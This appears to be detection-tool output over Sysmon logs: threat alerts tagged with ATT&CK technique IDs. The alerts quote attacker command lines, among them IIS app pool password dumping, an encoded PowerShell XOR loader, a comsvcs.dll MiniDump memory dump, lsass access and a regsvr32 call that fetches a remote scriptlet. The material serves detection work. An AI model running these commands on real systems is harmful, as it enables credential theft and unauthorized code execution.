C:\Windows\System32\cryptdll.dll 6.1.7600.16385 (win7_rtm.090713-1255) Cryptography Manager Microsoft® Windows® Operating System Microsoft Corporation SHA1=C92A5E9D00AAC177C859B40247787E21D2483610,MD5=1128637CAD49A8E3C8B5FA5D0A061525,SHA256=6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278,IMPHASH=CBB91DBEF75B54D8F20A2EC3E1BC8AC2 true Microsoft Windows Valid ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1558920557.2707,2019-05-27T05:29:17.270700+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "ERROR ( message:Configuration error " /text:processmodel.password ),1," 1 5 4 1 0 0x8000000000000000 5886 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 01:29:17.230 365ABB72-3D6D-5CEB-0000-0010D763FF00 3240 C:\Windows\System32\inetsrv\appcmd.exe 7.5.7600.16385 (win7_rtm.090713-1255) Application Server Command Line Admin Tool Internet Information Services Microsoft Corporation "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "ERROR ( message:Configuration error " /text:processmodel.password C:\Windows\Temp\ IIS APPPOOL\DefaultAppPool 365ABB72-B26B-5CEA-0000-002023240800 0x82423 0 High SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 365ABB72-3D4A-5CEB-0000-0010FA93FD00 2584 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1567169648.396724,2019-08-30T16:54:08.396724+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full)",1," 1 5 4 1 0 0x8000000000000000 32154 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-08-30 12:54:08.331 747F3D96-1C70-5D69-0000-0010C9661F00 2888 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-1B6A-5D69-0000-0020E5810E00 0xe81e5 1 High SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-1C70-5D69-0000-0010D4551F00 1144 C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1567169648.396724,2019-08-30T16:54:08.396724+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full )",1," 1 5 4 1 0 0x8000000000000000 32154 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-08-30 12:54:08.331 747F3D96-1C70-5D69-0000-0010C9661F00 2888 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-1B6A-5D69-0000-0020E5810E00 0xe81e5 1 High SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-1C70-5D69-0000-0010D4551F00 1144 C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1085] Rundll32 Execution detected,1567169648.396724,2019-08-30T16:54:08.396724+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full )",1," 1 5 4 1 0 0x8000000000000000 32154 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-08-30 12:54:08.331 747F3D96-1C70-5D69-0000-0010C9661F00 2888 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-1B6A-5D69-0000-0020E5810E00 0xe81e5 1 High SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-1C70-5D69-0000-0010D4551F00 1144 C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1047] Windows Management Instrumentation - Process,1567169648.396724,2019-08-30T16:54:08.396724+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full )",1," 1 5 4 1 0 0x8000000000000000 32154 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-08-30 12:54:08.331 747F3D96-1C70-5D69-0000-0010C9661F00 2888 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-1B6A-5D69-0000-0020E5810E00 0xe81e5 1 High SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-1C70-5D69-0000-0010D4551F00 1144 C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1567169648.396724,2019-08-30T16:54:08.396724+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full )",1," 1 5 4 1 0 0x8000000000000000 32154 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-08-30 12:54:08.331 747F3D96-1C70-5D69-0000-0010C9661F00 2888 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-1B6A-5D69-0000-0020E5810E00 0xe81e5 1 High SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-1C70-5D69-0000-0010D4551F00 1144 C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1003.001] Credential dump Thread Open to Lsass,1601297256.206545,2020-09-28T16:47:36.206545+04:00,,Threat,Critical,Process ( C:\Windows\System32\rdrleakdiag.exe) attempted to access lsass process ( C:\Windows\System32\lsass.exe),8," 8 2 4 8 0 0x8000000000000000 5227 Microsoft-Windows-Sysmon/Operational DESKTOP-PIU87N6 2020-09-28 12:47:36.204 BC47D85C-DB68-5F71-0000-0010B237AB01 3352 C:\Windows\System32\rdrleakdiag.exe BC47D85C-FAA9-5F68-0000-0010D9590000 668 C:\Windows\System32\lsass.exe 3468 0x00007FF8C72C5EC0 C:\WINDOWS\SYSTEM32\ntdll.dll ",DESKTOP-PIU87N6,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1558920557.190585,2019-05-27T05:29:17.190585+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "ERROR ( message:Configuration error " /text:processmodel.username ),1," 1 5 4 1 0 0x8000000000000000 5883 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 01:29:17.150 365ABB72-3D6D-5CEB-0000-00101760FF00 2104 C:\Windows\System32\inetsrv\appcmd.exe 7.5.7600.16385 (win7_rtm.090713-1255) Application Server Command Line Admin Tool Internet Information Services Microsoft Corporation "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "ERROR ( message:Configuration error " /text:processmodel.username C:\Windows\Temp\ IIS APPPOOL\DefaultAppPool 365ABB72-B26B-5CEA-0000-002023240800 0x82423 0 High SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 365ABB72-3D4A-5CEB-0000-0010FA93FD00 2584 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1082] System Information Discovery,1555606894.168542,2019-04-18T21:01:34.168542+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( "C:\Windows\system32\whoami.exe" /user) ,1," 1 5 4 1 0 0x8000000000000000 24 Microsoft-Windows-Sysmon/Operational IEWIN7 technique_id=T1033,technique_name=System Owner/User Discovery 2019-04-18 17:00:09.677 365ABB72-AD19-5CB8-0000-0010F4F40C00 3980 C:\Windows\System32\whoami.exe 6.1.7600.16385 (win7_rtm.090713-1255) whoami - displays logged on user information Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\whoami.exe" /user C:\Users\IEUser\Desktop\ IEWIN7\IEUser 365ABB72-AB27-5CB8-0000-002021CA0000 0xca21 1 High SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 365ABB72-AC28-5CB8-0000-0010F3F70700 1200 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell ",IEWIN7,Microsoft-Windows-Sysmon/Operational [ T0000 ] Suspicious process name detected,1555606894.168542,2019-04-18T21:01:34.168542+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( "C:\Windows\system32\whoami.exe" /user ) contain suspicious command ( whoami.exe),1," 1 5 4 1 0 0x8000000000000000 24 Microsoft-Windows-Sysmon/Operational IEWIN7 technique_id=T1033,technique_name=System Owner/User Discovery 2019-04-18 17:00:09.677 365ABB72-AD19-5CB8-0000-0010F4F40C00 3980 C:\Windows\System32\whoami.exe 6.1.7600.16385 (win7_rtm.090713-1255) whoami - displays logged on user information Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\whoami.exe" /user C:\Users\IEUser\Desktop\ IEWIN7\IEUser 365ABB72-AB27-5CB8-0000-002021CA0000 0xca21 1 High SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 365ABB72-AC28-5CB8-0000-0010F3F70700 1200 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1557770599.895876,2019-05-13T22:03:19.895876+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll)",1," 1 5 4 1 0 0x8000000000000000 17287 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-13 18:03:19.497 365ABB72-B167-5CD9-0000-001062160C00 2476 C:\Windows\System32\regsvr32.exe 6.1.7600.16385 (win7_rtm.090713-1255) Microsoft(C) Register Server Microsoft® Windows® Operating System Microsoft Corporation /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll C:\Windows\system32\ IEWIN7\IEUser 365ABB72-B0EC-5CD9-0000-00201D340100 0x1341d 1 Medium SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583 365ABB72-B0EC-5CD9-0000-0010D9D20000 944 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1117] Regsvr32,1557770599.895876,2019-05-13T22:03:19.895876+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll ),1," 1 5 4 1 0 0x8000000000000000 17287 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-13 18:03:19.497 365ABB72-B167-5CD9-0000-001062160C00 2476 C:\Windows\System32\regsvr32.exe 6.1.7600.16385 (win7_rtm.090713-1255) Microsoft(C) Register Server Microsoft® Windows® Operating System Microsoft Corporation /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll C:\Windows\system32\ IEWIN7\IEUser 365ABB72-B0EC-5CD9-0000-00201D340100 0x1341d 1 Medium SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583 365ABB72-B0EC-5CD9-0000-0010D9D20000 944 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs ",IEWIN7,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557770599.895876,2019-05-13T22:03:19.895876+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll ),1," 1 5 4 1 0 0x8000000000000000 17287 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-13 18:03:19.497 365ABB72-B167-5CD9-0000-001062160C00 2476 C:\Windows\System32\regsvr32.exe 6.1.7600.16385 (win7_rtm.090713-1255) Microsoft(C) Register Server Microsoft® Windows® Operating System Microsoft Corporation /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll C:\Windows\system32\ IEWIN7\IEUser 365ABB72-B0EC-5CD9-0000-00201D340100 0x1341d 1 Medium SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583 365ABB72-B0EC-5CD9-0000-0010D9D20000 944 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1552853889.653126,2019-03-18T00:18:09.653126+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding)",1," 1 5 4 1 0 0x8000000000000000 5275 Microsoft-Windows-Sysmon/Operational PC04.example.corp 2019-03-17 20:18:09.593 365ABB72-AB81-5C8E-0000-00102E9E0C00 3892 C:\Windows\System32\rundll32.exe 6.1.7600.16385 (win7_rtm.090713-1255) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding C:\Windows\system32\ PC04\IEUser 365ABB72-A960-5C8E-0000-002004C00300 0x3c004 1 High MD5=C648901695E275C8F2AD04B687A68CE2,IMPHASH=239D911DFA7551A8B735680BC39B2238 365ABB72-173D-5C8F-0000-00102A6A0000 608 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch ",PC04.example.corp,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1552853889.653126,2019-03-18T00:18:09.653126+04:00,,Threat,High,"Found User (PC04\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding )",1," 1 5 4 1 0 0x8000000000000000 5275 Microsoft-Windows-Sysmon/Operational PC04.example.corp 2019-03-17 20:18:09.593 365ABB72-AB81-5C8E-0000-00102E9E0C00 3892 C:\Windows\System32\rundll32.exe 6.1.7600.16385 (win7_rtm.090713-1255) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding C:\Windows\system32\ PC04\IEUser 365ABB72-A960-5C8E-0000-002004C00300 0x3c004 1 High MD5=C648901695E275C8F2AD04B687A68CE2,IMPHASH=239D911DFA7551A8B735680BC39B2238 365ABB72-173D-5C8F-0000-00102A6A0000 608 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch ",PC04.example.corp,Microsoft-Windows-Sysmon/Operational [T1085] Rundll32 Execution detected,1552853889.653126,2019-03-18T00:18:09.653126+04:00,,Threat,High,"Found User (PC04\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding )",1," 1 5 4 1 0 0x8000000000000000 5275 Microsoft-Windows-Sysmon/Operational PC04.example.corp 